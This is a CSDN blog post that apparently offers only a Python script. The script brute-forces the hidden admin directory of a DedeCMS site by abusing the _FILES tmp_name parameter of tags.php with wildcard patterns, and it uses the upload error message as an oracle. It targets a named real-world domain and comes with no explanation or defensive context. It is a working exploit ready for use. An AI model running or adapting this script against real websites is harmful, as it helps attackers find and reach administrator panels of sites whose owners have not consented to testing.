DEDE暴力破解后台登录页面-CSDN博客

DEDE暴力破解后台登录页面

 1 #!/usr/bin/env python
 2 '''/*
 3     * author = Mochazz
 4     * team   = 红日安全团队
 5     * env    = pyton3
 6     *
 7     */
 8 '''
 9 import requests
10 import itertools
11 characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
12 back_dir = ""
13 flag = 0
14 url = "http://www.rmjdw.com/tags.php"
15 data = {
16     "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
17     "_FILES[mochazz][name]" : 0,
18     "_FILES[mochazz][size]" : 0,
19     "_FILES[mochazz][type]" : "image/gif"
20 }
21 
22 for num in range(1,7):
23     if flag:
24         break
25     for pre in itertools.permutations(characters,num):
26         pre = ''.join(list(pre))
27         data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
28         print("testing",pre)
29         r = requests.post(url,data=data)
30         if "Upload filetype not allow !" not in r.text and r.status_code == 200:
31             flag = 1
32             back_dir = pre
33             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
34             break
35         else:
36             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
37 print("[+] 前缀为：",back_dir)
38 flag = 0
39 for i in range(30):
40     if flag:
41         break
42     for ch in characters:
43         if ch == characters[-1]:
44             flag = 1
45             break
46         data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
47         r = requests.post(url, data=data)
48         if "Upload filetype not allow !" not in r.text and r.status_code == 200:
49             back_dir += ch
50             print("[+] ",back_dir)
51             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
52             break
53         else:
54             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
55 
56 print("后台地址为：",back_dir)